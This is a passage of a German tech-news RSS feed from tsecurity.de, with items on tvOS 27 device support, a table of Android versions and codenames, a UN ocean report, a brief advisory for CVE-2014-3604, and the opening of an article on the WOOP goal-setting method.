<description><![CDATA[tvOS 27 kommt nicht mehr auf alle Geräte, die noch tvOS 26 erhalten haben. Raus sind nach aktuellem Stand der Apple TV HD aus dem Jahr 2015 und der Apple TV 4K der ersten Generation von 2017. Laut Apples Dokumentation...Zum Beitrag: tvOS 27: Apple streicht Unterstützung für zwei Apple-TV-Modelle
...]]></description>
<link>https://tsecurity.de/de/3584700/it-nachrichten/tvos-27-apple-streicht-unterstuetzung-fuer-zwei-apple-tv-modelle/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3584700/it-nachrichten/tvos-27-apple-streicht-unterstuetzung-fuer-zwei-apple-tv-modelle/</guid>
<pubDate>Tue, 09 Jun 2026 15:32:59 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[tvOS 27 kommt nicht mehr auf alle Geräte, die noch tvOS 26 erhalten haben. Raus sind nach aktuellem Stand der Apple TV HD aus dem Jahr 2015 und der Apple TV 4K der ersten Generation von 2017. Laut Apples Dokumentation...<p>Zum Beitrag: <a href="https://stadt-bremerhaven.de/tvos-27-apple-streicht-unterstuetzung-fuer-zwei-apple-tv-modelle/">tvOS 27: Apple streicht Unterstützung für zwei Apple-TV-Modelle</a>
</p><p>
Wo du uns folgen kannst:
<a href="http://www.facebook.com/CaschysBlog">Facebook</a>, <a href="https://www.reddit.com/r/CaschysBlog/">Reddit</a>, <a href="https://news.google.com/publications/CAAqMQgKIitDQklTR2dnTWFoWUtGSE4wWVdSMExXSnlaVzFsY21oaGRtVnVMbVJsS0FBUAE?ceid=DE:de&amp;oc=3">Google News</a>, <a href="https://x.com/CaschysBlog">X</a>, <a href="https://www.threads.com/@caschysblog">Threads</a>
<br>
</p><div>
    <strong>Auf dem Laufenden bleiben?</strong>
    <br>
    <a href="https://www.google.com/preferences/source?q=stadt-bremerhaven.de">Fügt uns doch bei Google als bevorzugte Quelle hinzu!</a>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Alle Android-Versionen samt Codenamen im Überblick]]></title>
<description><![CDATA[Mit Android 17 aka “Cinnamon Bun” setzt Google im Sommer 2026 seine Android-Historie und damit auch seine traditionelle Namensgebung fort. Dieser Artikel liefert Ihnen einen Überblick über alle bisherigen Android-Versionen samt ihrer süßen Codenamen.



Android: eine Zeitreise durchs Süßwarenrega...]]></description>
<link>https://tsecurity.de/de/3584374/windows-tipps/alle-android-versionen-samt-codenamen-im-ueberblick/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3584374/windows-tipps/alle-android-versionen-samt-codenamen-im-ueberblick/</guid>
<pubDate>Tue, 09 Jun 2026 13:40:51 +0200</pubDate>
<category>🪟 Windows Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Mit Android 17 aka “Cinnamon Bun” setzt Google im Sommer 2026 seine Android-Historie und damit auch seine traditionelle Namensgebung fort. Dieser Artikel liefert Ihnen einen Überblick über alle bisherigen Android-Versionen samt ihrer süßen Codenamen.</p>



<h2 class="wp-block-heading">Android: eine Zeitreise durchs Süßwarenregal</h2>



<p>Dass Google seine OS-Versionen seit jeher nach Süßspeisen benennt, dürfte nach inzwischen 18 Jahren Android-Geschichte kein Geheimnis mehr sein. Was ursprünglich für (vorwiegend) interne Zwecke gedacht war, entwickelte sich über die Jahre zu einer beliebten Tradition. </p>



<p>Die Codenamen folgen dabei dem Alphabet. Android 15 markierte mit “Vanilla Ice Cream” das Ende des ersten Durchlaufs. Mit Android 16 startet Google von vorn: Die aktuelle Version trägt den Codenamen “Baklava” und Android 17 wird den Namen “Cinnamon Bun” erhalten. </p>



<p></p>



<p>Doch welche Süßspeisen haben es seit 2008 in die Android-Historie geschafft? Ein Überblick über sämtliche Versionen samt Veröffentlichung und Codenamen:</p>



<figure class="wp-block-table is-style-stripes"><table class="has-fixed-layout"><thead><tr><th>Android-Version</th><th>Veröffentlichung</th><th>Codename</th></tr></thead><tbody><tr><td>1.0</td><td>September 2008</td><td>Angel Cake</td></tr><tr><td>1.1</td><td>Februar 2009</td><td>Battenberg Cake</td></tr><tr><td>1.5</td><td>April 2009</td><td>Cupcake</td></tr><tr><td>1.6</td><td>September 2009</td><td>Donut</td></tr><tr><td>2.0 – 2.1</td><td>Oktober 2009</td><td>Éclair</td></tr><tr><td>2.2 – 2.2.2</td><td>Mai 2010</td><td>Froyo</td></tr><tr><td>2.3 – 2.3.7</td><td>Dezember 2010</td><td>Gingerbread</td></tr><tr><td>3.0 – 3.2.1</td><td>Februar 2011</td><td>Honeycomb</td></tr><tr><td>4.0 – 4.0.4</td><td>Oktober 2011</td><td>Ice Cream Sandwich</td></tr><tr><td>4.1 – 4.3.1</td><td>Juni 2012</td><td>Jelly Bean</td></tr><tr><td>4.4 – 4.4.4</td><td>Oktober 2013</td><td>KitKat</td></tr><tr><td>5.0 – 5.1.1</td><td>Dezember 2014</td><td>Lollipop</td></tr><tr><td>6.0 – 6.0.1</td><td>August 2015</td><td>Marshmallow</td></tr><tr><td>7.0 – 7.1.2</td><td>August 2016</td><td>Nougat</td></tr><tr><td>8.0 – 8.1</td><td>August 2017</td><td>Oreo</td></tr><tr><td>9</td><td>August 2018</td><td>Pie</td></tr><tr><td>10</td><td>September 2019</td><td>Quince Tart</td></tr><tr><td>11</td><td>September 2020</td><td>Red Velvet Cake</td></tr><tr><td>12</td><td>Oktober 2021</td><td>Snow Cone</td></tr><tr><td>13</td><td>August 2022</td><td>Tiramisu</td></tr><tr><td>14</td><td>Oktober 2023</td><td>Upside Down Cake</td></tr><tr><td>15</td><td>September 2024</td><td>Vanilla Ice Cream</td></tr><tr><td>16</td><td>Juni 2025</td><td>Baklava</td></tr><tr><td>17</td><td>Q2 2026</td><td>Cinnamon Bun</td></tr></tbody></table></figure>



<h2 class="wp-block-heading">Was ist neu seit Android 16?</h2>



<p>Google startete mit Android 16 nicht nur einen neuen Alphabet-Durchlauf, sondern auch einen neuen Entwicklungsrhythmus: Das Update erschien bereits im Frühsommer 2025 und damit etwas früher als normalerweise.</p>



<p>Inhaltlich brachte Android 16 eine überarbeitete Oberfläche namens Material 3 Expressive sowie Live Updates. Das sind Echtzeit-Benachrichtigungen, die laufende Aktivitäten wie eine Lieferung oder Navigation direkt in der Statusleiste anzeigen. Samsung hat Android 16 für seine <a href="https://www.pcwelt.de/article/1204479/test-das-beste-samsung-galaxy-smartphone.html" data-type="link" data-id="https://www.pcwelt.de/article/1204479/test-das-beste-samsung-galaxy-smartphone.html" target="_blank" rel="noreferrer noopener">aktuellen Galaxy-Geräte</a> unter dem Namen One UI 8.5 ausgerollt.</p>



<h4 class="wp-block-heading">Die besten Angebote für das aktuelle Samsung Galaxy S26 Ultra</h4>



				<div class="wp-block-price-comparison price-comparison">
		
		<div class="new_products_tab tabcontent ">

			<div class="price-comparison__record price-comparison__record--header">
				<div>
					<span>Shop</span>
				</div>
								<div class="price-comparison__price">
					<span>Preis</span>
				</div>
			</div>

								<div class="price-comparison__record  ">
						<div class="price-comparison__image">
															<img decoding="async" src="https://cdn.billiger.com/dynimg/shops/x/4541.png" alt="notebooksbilliger" loading="lazy">
													</div>
												<div class="price-comparison__price ">
						<span>979,00 €</span>						</div>
						<div>
							<a class="price-comparison__view-button" href="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=RN9OriDYAtSgFdiMIpCMzM5qyWFNKPJzL7nY_gEpKI5He66dKLCcTskzmk7s2ctpvSl923nsGZ8vE30bjvaFmhcExcfMRGQgECdBHof2fasebWCvty-nT57ZJFUfe4jgSCMIMJod4ad&amp;mid=686062104457&amp;id=686062104457&amp;ts=20260609&amp;log=rss" data-vars-product-name="Samsung Galaxy S26 Ultra" data-vars-product-id="3082778" data-vars-category="Smartphones" data-vars-manufacturer-id="11290" data-vars-manufacturer="Samsung" data-vars-vendor="billiger,amazon,gtin,mpn,Samsung" data-vars-po="billiger,amazon,gtin,mpn" data-product="3082778" data-vars-link-position-id="000" data-vars-link-position="Price Comparison Body" data-vars-outbound-link="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=RN9OriDYAtSgFdiMIpCMzM5qyWFNKPJzL7nY_gEpKI5He66dKLCcTskzmk7s2ctpvSl923nsGZ8vE30bjvaFmhcExcfMRGQgECdBHof2fasebWCvty-nT57ZJFUfe4jgSCMIMJod4ad&amp;mid=686062104457&amp;id=686062104457&amp;ts=20260609&amp;log=rss" data-vendor-api="billiger" data-vars-product-price="979,00 €" data-vars-product-vendor="notebooksbilliger" aria-label="Deal anschauen bei notebooksbilliger für 979,00 €" target="_blank">Jetzt ansehen</a>						</div>
					</div>
										<div class="price-comparison__record  ">
						<div class="price-comparison__image">
															<img decoding="async" src="https://s24.media/shop/9bc1cc59a6924c89ab4ce8772c3a76c2" alt="Netto-Online" loading="lazy">
													</div>
												<div class="price-comparison__price ">
						<span>1.225,71 €</span>						</div>
						<div>
							<a class="price-comparison__view-button" href="https://lg.s24.cloud/catalog/9116/189678/9581936913" data-vars-product-name="Samsung Galaxy S26 Ultra" data-vars-product-id="3082778" data-vars-category="Smartphones" data-vars-manufacturer-id="11290" data-vars-manufacturer="Samsung" data-vars-vendor="billiger,amazon,gtin,mpn,Samsung" data-vars-po="billiger,amazon,gtin,mpn" data-product="3082778" data-vars-link-position-id="000" data-vars-link-position="Price Comparison Body" data-vars-outbound-link="https://lg.s24.cloud/catalog/9116/189678/9581936913" data-vendor-api="shopping24" data-vars-product-price="1.225,71 €" data-vars-product-vendor="Netto-Online" aria-label="Deal anschauen bei Netto-Online für 1.225,71 €" target="_blank">Jetzt ansehen</a>						</div>
					</div>
										<div class="price-comparison__record  ">
						<div class="price-comparison__image">
															<img decoding="async" src="https://cdn.billiger.com/dynimg/shops/x/934.png" alt="baur.de" loading="lazy">
													</div>
												<div class="price-comparison__price ">
						<span>1.429,99 €</span>						</div>
						<div>
							<a class="price-comparison__view-button" href="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=sxs0D2FjMcqvsU1Wdh-mdc5Hd99OQeF7XC8OQBEBgUb0hMF-xhY9zlcjssOt7fkFYp5eUIvJnUoVAesFtOqK6FcYkEbUKExtLbV8fHNLNLuxIt7SrQig-xAvwtTYZ8iVzMdBY5bCkNVIsjqVD5uBAQJ9DaK675oNA&amp;mid=686084869391&amp;id=686084869391&amp;ts=20260609&amp;log=rss" data-vars-product-name="Samsung Galaxy S26 Ultra" data-vars-product-id="3082778" data-vars-category="Smartphones" data-vars-manufacturer-id="11290" data-vars-manufacturer="Samsung" data-vars-vendor="billiger,amazon,gtin,mpn,Samsung" data-vars-po="billiger,amazon,gtin,mpn" data-product="3082778" data-vars-link-position-id="000" data-vars-link-position="Price Comparison Body" data-vars-outbound-link="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=sxs0D2FjMcqvsU1Wdh-mdc5Hd99OQeF7XC8OQBEBgUb0hMF-xhY9zlcjssOt7fkFYp5eUIvJnUoVAesFtOqK6FcYkEbUKExtLbV8fHNLNLuxIt7SrQig-xAvwtTYZ8iVzMdBY5bCkNVIsjqVD5uBAQJ9DaK675oNA&amp;mid=686084869391&amp;id=686084869391&amp;ts=20260609&amp;log=rss" data-vendor-api="billiger" data-vars-product-price="1.429,99 €" data-vars-product-vendor="baur.de" aria-label="Deal anschauen bei baur.de für 1.429,99 €" target="_blank">Jetzt ansehen</a>						</div>
					</div>
										<div class="price-comparison__record amazon_forth_place ">
						<div class="price-comparison__image">
															<img decoding="async" src="https://cdn.billiger.com/dynimg/shops/x/3667.png" alt="OTTO" loading="lazy">
													</div>
												<div class="price-comparison__price ">
						<span>1.429,99 €</span>						</div>
						<div>
							<a class="price-comparison__view-button" href="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=TaM1-5078emXVSmyu4TSBM21GiGtW1fN8NR0CfH9Boz5p11Pk4U7aXFlvu16PzmZlKfpa4qJRMyifaNTjVLvixyDS-vUb8z9_tRlyLJ07ivmvW-bb1CMpv-36FjQGAbl_Jy4HCy7jhQJO-b31T0VW8&amp;mid=686062118222&amp;id=686062118222&amp;ts=20260609&amp;log=rss" data-vars-product-name="Samsung Galaxy S26 Ultra" data-vars-product-id="3082778" data-vars-category="Smartphones" data-vars-manufacturer-id="11290" data-vars-manufacturer="Samsung" data-vars-vendor="billiger,amazon,gtin,mpn,Samsung" data-vars-po="billiger,amazon,gtin,mpn" data-product="3082778" data-vars-link-position-id="000" data-vars-link-position="Price Comparison Body" data-vars-outbound-link="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=TaM1-5078emXVSmyu4TSBM21GiGtW1fN8NR0CfH9Boz5p11Pk4U7aXFlvu16PzmZlKfpa4qJRMyifaNTjVLvixyDS-vUb8z9_tRlyLJ07ivmvW-bb1CMpv-36FjQGAbl_Jy4HCy7jhQJO-b31T0VW8&amp;mid=686062118222&amp;id=686062118222&amp;ts=20260609&amp;log=rss" data-vendor-api="billiger" data-vars-product-price="1.429,99 €" data-vars-product-vendor="OTTO" aria-label="Deal anschauen bei OTTO für 1.429,99 €" target="_blank">Jetzt ansehen</a>						</div>
					</div>
										<div class="price-comparison__hidden-records-wrapper">
									<div class="price-comparison__record  ">
						<div class="price-comparison__image">
															<img decoding="async" src="https://cdn.billiger.com/dynimg/shops/x/15554.png" alt="Proshop.de" loading="lazy">
													</div>
												<div class="price-comparison__price ">
						<span>1.449,00 €</span>						</div>
						<div>
							<a class="price-comparison__view-button" href="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=Hoe_p9pc_c0XVSmyu4TSBM21GiGtW1fN3jMdSHFwnS55p11Pk4U7aVp7o4zpgRdnokZKpwcYI7dhlaFBJ0XOrvWrxaujk9KwO1U_NuDl7e7PN2szI6ujqvdsZLYOSPHISb_FqQXJxsbTJZvBxqRh5M&amp;mid=686061937859&amp;id=686061937859&amp;ts=20260609&amp;log=rss" data-vars-product-name="Samsung Galaxy S26 Ultra" data-vars-product-id="3082778" data-vars-category="Smartphones" data-vars-manufacturer-id="11290" data-vars-manufacturer="Samsung" data-vars-vendor="billiger,amazon,gtin,mpn,Samsung" data-vars-po="billiger,amazon,gtin,mpn" data-product="3082778" data-vars-link-position-id="000" data-vars-link-position="Price Comparison Body" data-vars-outbound-link="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=Hoe_p9pc_c0XVSmyu4TSBM21GiGtW1fN3jMdSHFwnS55p11Pk4U7aVp7o4zpgRdnokZKpwcYI7dhlaFBJ0XOrvWrxaujk9KwO1U_NuDl7e7PN2szI6ujqvdsZLYOSPHISb_FqQXJxsbTJZvBxqRh5M&amp;mid=686061937859&amp;id=686061937859&amp;ts=20260609&amp;log=rss" data-vendor-api="billiger" data-vars-product-price="1.449,00 €" data-vars-product-vendor="Proshop.de" aria-label="Deal anschauen bei Proshop.de für 1.449,00 €" target="_blank">Jetzt ansehen</a>						</div>
					</div>
										<div class="price-comparison__record  ">
						<div class="price-comparison__image">
															<img decoding="async" src="https://www.pcwelt.de/wp-content/themes/idg-base-theme/dist/static/img/samsung-logo.svg" alt="Samsung" loading="lazy">
													</div>
												<div class="price-comparison__price ">
						<span>1.449,00 €</span>						</div>
						<div>
							<a class="price-comparison__view-button" href="https://www.awin1.com/cread.php?awinmid=14815&amp;awinaffid=486277&amp;clickref=rss&amp;platform=dl&amp;ued=https://www.samsung.com/de/smartphones/galaxy-s26-ultra/buy/" data-vars-product-name="Samsung Galaxy S26 Ultra" data-vars-product-id="3082778" data-vars-category="Smartphones" data-vars-manufacturer-id="11290" data-vars-manufacturer="Samsung" data-vars-vendor="billiger,amazon,gtin,mpn,Samsung" data-vars-po="billiger,amazon,gtin,mpn" data-product="3082778" data-vars-link-position-id="000" data-vars-link-position="Price Comparison Body" data-vars-outbound-link="https://www.awin1.com/cread.php?awinmid=14815&amp;awinaffid=486277&amp;clickref=rss&amp;platform=dl&amp;ued=https://www.samsung.com/de/smartphones/galaxy-s26-ultra/buy/" data-vars-product-price="1.449,00 €" data-vars-product-vendor="Samsung" aria-label="Deal anschauen bei Samsung für 1.449,00 €" target="_blank">Jetzt ansehen</a>						</div>
					</div>
										<div class="price-comparison__record  amazon_vendor">
						<div class="price-comparison__image">
															<img decoding="async" src="https://www.pcwelt.de/wp-content/themes/idg-base-theme/dist/static/img/amazon-logo.svg" alt="Amazon" loading="lazy">
													</div>
												<div class="price-comparison__price ">
						<span>1.540,00 €</span>						</div>
						<div>
							<a class="price-comparison__view-button" href="https://www.amazon.de/dp/B0G58WV8XS?tag=pcwelt.de-21&amp;linkCode=ogi&amp;th=1&amp;psc=1&amp;ascsubtag=rss" data-vars-product-name="Samsung Galaxy S26 Ultra" data-vars-product-id="3082778" data-vars-category="Smartphones" data-vars-manufacturer-id="11290" data-vars-manufacturer="Samsung" data-vars-vendor="billiger,amazon,gtin,mpn,Samsung" data-vars-po="billiger,amazon,gtin,mpn" data-product="3082778" data-vars-link-position-id="000" data-vars-link-position="Price Comparison Body" data-vars-outbound-link="https://www.amazon.de/dp/B0G58WV8XS?tag=pcwelt.de-21&amp;linkCode=ogi&amp;th=1&amp;psc=1&amp;ascsubtag=rss" data-vendor-api="amazon" data-vars-product-price="1.540,00 €" data-vars-product-vendor="Amazon" aria-label="Deal anschauen bei Amazon für 1.540,00 €" target="_blank">Jetzt ansehen</a>						</div>
					</div>
						
									</div>
									<div class="price-comparison__record price-comparison__record--footer">
					<span class="price-comparison__footer-text">
													Preisvergleich (über 24.000 Shops weltweit)												</span>
											<button class="price-comparison__view-more-button">
							Weitere Angebote						</button>
									</div>
		</div>

		<div class="refurbished_products_tab tabcontent">
			<div class="refurbished-padding price-comparison__record price-comparison__record--header">
				<div>
					<span>Produkt</span>
				</div>
				<div class="price-comparison__price">
					<span>Preis</span>
				</div>
			</div>
							<div class="price-comparison__record price-comparison__record--footer">
					<span class="price-comparison__footer-text">
					Preisvergleich von Backmarket						</span>
									</div>
		</div>
		</div>
		


<p><a href="https://www.pcwelt.de/article/3092158/android-17-diese-handys-smartphones-androiden-bekommen-android-update-herstelleruebersicht-mobilgeraete-alle-infos.html" target="_blank" rel="noreferrer noopener">Android 17</a> erscheint voraussichtlich im Sommer 2026. Die wichtigsten Neuerungen: KI-Funktionen unter dem Label Gemini Intelligence sind direkt ins System integriert, ein neuer Desktop-Modus macht Android fit für die PC-ähnliche Nutzung, und mit “Continue On” lässt sich nahtlos zwischen Geräten wechseln – ähnlich wie Apples Handoff-Funktion. Dazu kommen eine überarbeitete Oberfläche für große Bildschirme und verbesserte Datenschutzeinstellungen.</p>



<h2 class="wp-block-heading">Das passende Android-Smartphone für jedes Budget</h2>



<p>Die aktuellen Android-Flaggschiffe wie das <a href="https://www.pcwelt.de/article/2894857/google-pixel-10-pro-test-2.html" target="_blank" rel="noreferrer noopener">Google Pixel 10 Pro</a> und das <a href="https://www.pcwelt.de/article/3108173/samsung-galaxy-s26-test.html" target="_blank" rel="noreferrer noopener">Samsung Galaxy S26</a> laufen natürlich mit den neuesten Android-Versionen. Aber auch im Mittelfeld und bei den Budgetgeräten gibt es inzwischen starke Alternativen. Welches Gerät sich für Sie lohnt, zeigen unsere Bestenlisten:</p>



<ul class="wp-block-list">
<li><a href="https://www.pcwelt.de/article/1924183/das-beste-smartphone-im-test.html" target="_blank" rel="noreferrer noopener">Die besten Smartphones im Test</a></li>



<li><a href="https://www.pcwelt.de/article/1204479/test-das-beste-samsung-galaxy-smartphone.html" target="_blank" rel="noreferrer noopener">Die besten Samsung-Galaxy-Smartphones</a></li>



<li><a href="https://www.pcwelt.de/article/2780193/beste-smartphones-handys-bis-500-euro.html" target="_blank" rel="noreferrer noopener">Die besten Smartphones bis 500 Euro</a></li>



<li><a href="https://www.pcwelt.de/article/2778347/beste-budget-smartphones-bis-300-euro.html" target="_blank" rel="noreferrer noopener">Die besten Budget-Smartphones bis 300 Euro</a></li>
</ul>

</div>]]></content:encoded>
</item>
<item>
<title><![CDATA['Severe' Stress On Oceans As Rate of Sea Level Rise Doubles In 10 Years, UN Warns]]></title>
<description><![CDATA[An anonymous reader quotes a report from The Guardian: The world's oceans are under "severe and accelerating" pressure from human activities, with the rate of sea-level rise double that of a decade ago, according to a damning assessment from the United Nations. The "intensifying" stressors, which...]]></description>
<link>https://tsecurity.de/de/3583438/it-security-nachrichten/severe-stress-on-oceans-as-rate-of-sea-level-rise-doubles-in-10-years-un-warns/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3583438/it-security-nachrichten/severe-stress-on-oceans-as-rate-of-sea-level-rise-doubles-in-10-years-un-warns/</guid>
<pubDate>Tue, 09 Jun 2026 05:50:19 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[An anonymous reader quotes a report from The Guardian: The world's oceans are under "severe and accelerating" pressure from human activities, with the rate of sea-level rise double that of a decade ago, according to a damning assessment from the United Nations. The "intensifying" stressors, which include pollution and large-scale industrial fishing, are cumulative, said the report, resulting in widespread biodiversity loss and putting ocean systems under "severe strain."
 
The UN's third World Ocean Assessment, which reflects the work of nearly 600 scientists from 86 countries, looked at the oceans' health from 2021-25. The previous report, that covered up to 2018, found persistent degradation of the marine environment. Five years on, scientists know more about the cumulative impacts of anthropogenic pressures on the ocean, and the latest report shows just how much of the damage has been done in the past few years. The scientists' key findings include:
 - Sea levels continue to rise at an increasing rate, from 2mm a year prior to 2015 to 4.3mm a year in 2023.
 - 16% of the increase in global ocean heat since 1955 occurred after 2018.
 - The greatest relative warming has been observed in the Atlantic Ocean and the southern parts of the Indian and Pacific Oceans.
 - Large gaps in knowledge persist -- with only 27% of the ocean floor mapped by 2025, deep-sea ecosystems remain poorly understood. Lukas Meus, Greenpeace's global ocean campaigner, said: "We are calling on governments to create fully protected ocean sanctuaries that will close vast areas of the ocean off from extractive human activities. Governments have promised to protect 30% of the world's ocean by 2030 -- the minimum scientists say we need for the ocean to be able to recover."<p></p><div class="share_submission">
<a class="slashpop" href="http://twitter.com/home?status='Severe'+Stress+On+Oceans+As+Rate+of+Sea+Level+Rise+Doubles+In+10+Years%2C+UN+Warns%3A+https%3A%2F%2Fnews.slashdot.org%2Fstory%2F26%2F06%2F08%2F2251201%2F%3Futm_source%3Dtwitter%26utm_medium%3Dtwitter"><img src="https://a.fsdn.com/sd/twitter_icon_large.png"></a>
<a class="slashpop" href="http://www.facebook.com/sharer.php?u=https%3A%2F%2Fnews.slashdot.org%2Fstory%2F26%2F06%2F08%2F2251201%2Fsevere-stress-on-oceans-as-rate-of-sea-level-rise-doubles-in-10-years-un-warns%3Futm_source%3Dslashdot%26utm_medium%3Dfacebook"><img src="https://a.fsdn.com/sd/facebook_icon_large.png"></a>



</div><p><a href="https://news.slashdot.org/story/26/06/08/2251201/severe-stress-on-oceans-as-rate-of-sea-level-rise-doubles-in-10-years-un-warns?utm_source=rss1.0moreanon&amp;utm_medium=feed">Read more of this story</a> at Slashdot.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2014-3604 | Not Yet Commons SSL up to 0.3.14 X.509 Certificates.java cryptographic issue (RHSA-2015:1888 / EUVD-2022-3600)]]></title>
<description><![CDATA[A vulnerability was found in Not Yet Commons SSL up to 0.3.14. It has been classified as critical. Impacted is an unknown function of the file Certificates.java of the component X.509 Certificate Handler. Performing a manipulation results in cryptographic issues.

This vulnerability was named CVE...]]></description>
<link>https://tsecurity.de/de/3581246/sicherheitsluecken/cve-2014-3604-not-yet-commons-ssl-up-to-0314-x509-certificatesjava-cryptographic-issue-rhsa-20151888-euvd-2022-3600/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3581246/sicherheitsluecken/cve-2014-3604-not-yet-commons-ssl-up-to-0314-x509-certificatesjava-cryptographic-issue-rhsa-20151888-euvd-2022-3600/</guid>
<pubDate>Mon, 08 Jun 2026 13:24:34 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability was found in <a href="https://vuldb.com/product/not_yet_commons_ssl">Not Yet Commons SSL up to 0.3.14</a>. It has been classified as <a href="https://vuldb.com/kb/risk">critical</a>. Impacted is an unknown function of the file <em>Certificates.java</em> of the component <em>X.509 Certificate Handler</em>. Performing a manipulation results in cryptographic issues.

This vulnerability was named <a href="https://vuldb.com/cve/CVE-2014-3604">CVE-2014-3604</a>. The attack may be initiated remotely. There is no available exploit.

Upgrading the affected component is recommended.]]></content:encoded>
</item>
<item>
<title><![CDATA[WOOP-Methode: So erreichen Sie Ihre Ziele]]></title>
<description><![CDATA[Die WOOP-Methode hilft, Hindernisse auf dem Weg zu einem (beruflichen) Ziel leichter zu meistern. 
					Foto: eamesBot – shutterstock.com




Nicht nur der Jahreswechsel ist eine willkommene Gelegenheit, um Vorsätze zu fassen. Man kann sich schließlich immer etwas Neues vornehmen. Aber ganz unabh...]]></description>
<link>https://tsecurity.de/de/3580346/it-security-nachrichten/woop-methode-so-erreichen-sie-ihre-ziele/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3580346/it-security-nachrichten/woop-methode-so-erreichen-sie-ihre-ziele/</guid>
<pubDate>Mon, 08 Jun 2026 05:08:00 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<div class="extendedBlock-wrapper block-coreImage"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" alt="Die WOOP-Methode hilft, Hindernisse auf dem Weg zu einem (beruflichen) Ziel leichter zu meistern. " title="Die WOOP-Methode hilft, Hindernisse auf dem Weg zu einem (beruflichen) Ziel leichter zu meistern. " src="https://images.computerwoche.de/bdb/3378456/840x473.jpg" width="840" height="473"><figcaption class="wp-element-caption"><p class="foundryImageCaption">Die WOOP-Methode hilft, Hindernisse auf dem Weg zu einem (beruflichen) Ziel leichter zu meistern. </p></figcaption></figure><p class="imageCredit">
					Foto: eamesBot – shutterstock.com</p></div>




<p>Nicht nur der Jahreswechsel ist eine willkommene Gelegenheit, um Vorsätze zu fassen. Man kann sich schließlich immer etwas Neues vornehmen. Aber ganz unabhängig vom Zeitpunkt ist das Ergebnis häufig gleich: Nach kurzer Zeit werden die guten <a href="https://www.computerwoche.de/article/2819572/so-setzen-sie-sich-realistische-berufsziele.html" title="Vorsätze" target="_blank">Vorsätze</a> nach und nach aufgeben, bis gar nichts oder nicht mehr viel davon übrig ist. Was viele jedoch nicht wissen: Es gibt eine (wissenschaftlich untermauerte) Methode, mit der sich Ziele in vier einfachen Schritten umsetzen lassen – die WOOP-Methode. </p>



<h3 class="wp-block-heading">WOOP-Methode: Die Ursprünge</h3>



<p>Die Psychologieprofessorin <a href="https://de.wikipedia.org/wiki/Gabriele_Oettingen" title="Gabriele Oettingen" target="_blank" rel="noopener">Gabriele Oettingen</a> hat sich über viele Jahre intensiv mit Fragen wie “Wie erreiche ich meine Ziele” und “Wie schaffe ich es, motiviert bei der Sache zu bleiben?” auseinandergesetzt. Besonders interessiert hat sie dabei die Fragestellung, was Menschen davon abhält, ihre <a href="https://www.computerwoche.de/article/2783396/warum-es-so-wichtig-ist-sich-persoenliche-ziele-zu-setzen.html" title="Ziele" target="_blank">Ziele</a> zu erreichen. Das Ergebnis: Allein eine positive Grundeinstellung hilft nicht wirklich weiter, wenn man ein bestimmtes Ziel erreichen möchte.</p>



<p>Eine bemerkenswerte Feststellung der Professorin, denn damit widerlegte sie mit ihrer Forschung, was jahrelang propagiert wurde: Wer nur positiv genug denke, der werde es auch schaffen, in der Zukunft positive Ergebnisse zu erzielen. Im schlimmsten Fall kann die positive <a href="https://www.computerwoche.de/article/2809195/denken-fuer-fortgeschrittene.html" title="Einstellung" target="_blank">Einstellung</a> sogar hinderlich sein. Einen Hinweis darauf fand Oettingen in einer Studie mit Frauen, die ihr Gewicht reduzieren wollten. Dabei zeigte sich, dass gerade diejenigen Frauen, die sich ihr neues Leben mit weniger Kilos besonders schön und erstrebenswert vorgestellt hatten, am wenigsten abnahmen.</p>



<p>Die Hochschullehrerin erklärt das damit, dass wir uns durch unsere <a href="https://www.computerwoche.de/article/2764162/neuer-spass-im-alten-job.html" title="positiven Gedanken" target="_blank">positiven Gedanken</a> vom eigentlichen Ziel ablenken lassen. Vereinfacht gesagt: Wer sich sein Ziel zu positiv ausmalt, könnte gewissermaßen auf die Idee kommen, das Ziel bereits erreicht zu haben. Und das wiederum führt dazu, dass wir uns weniger anstrengen und die Hindernisse, die in Wirklichkeit vor uns liegen, nicht beachten. Ein neuer Ansatz musste also her und den fand Oettingen auf der Grundlage ihrer weiteren Forschungsergebnisse. Sie entwickelte daraus die sogenannte WOOP-Strategie, die aus vier einfachen Schritten besteht.</p>



<figure class="wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio"><div class="wp-block-embed__wrapper youtube-video">

</div></figure>



<h3 class="wp-block-heading">WOOP-Methode umsetzen: 4 Schritte</h3>



<p>WOOP ist ein Akronym, das sich aus den Anfangsbuchstaben der folgenden englischen Begriffe zusammensetzt:</p>



<ul class="wp-block-list">
<li><p><strong>W</strong>ish (Wunsch)</p></li>



